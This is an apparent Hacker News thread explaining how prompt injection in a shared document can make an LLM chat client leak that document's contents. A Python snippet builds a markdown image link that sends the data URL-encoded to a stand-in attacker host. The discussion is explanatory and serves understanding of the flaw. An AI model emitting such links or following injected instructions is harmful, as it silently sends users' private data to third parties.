Hacker News

The vuln is that a user can be tricked into exfiltrating data to an attacker without it being obvious that anything has happened.





But what "data"? LLMs don't know anything except what they were trained on, right?

The article describes how the content of a document (which in theory should only be sent to OpenAI) can be exfiltrated to an attacker via URL parameters.
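As a rough sketch of the mechanism: if an injected instruction inside the document can get the model to emit a markdown image pointing at an attacker-controlled server, with the document's content URL-encoded into a query parameter, then a client that auto-renders images will send that content to the attacker as part of the image request. The endpoint name and parameter below are purely illustrative, not from the article.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (illustrative only).
ATTACKER_URL = "https://attacker.example/collect"

def exfil_markdown(secret: str) -> str:
    """Build a markdown image tag that leaks `secret` via a URL parameter.

    If an injected instruction can induce the LLM to output this markdown,
    and the chat client auto-fetches images, the secret travels to the
    attacker's server inside the request URL.
    """
    return "![](" + ATTACKER_URL + "?d=" + quote(secret) + ")"

print(exfil_markdown("contents of the private document"))
# → ![](https://attacker.example/collect?d=contents%20of%20the%20private%20document)
```

The user only sees a (possibly broken) image in the response; the exfiltration happens as a side effect of the image fetch, which is what makes it non-obvious.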


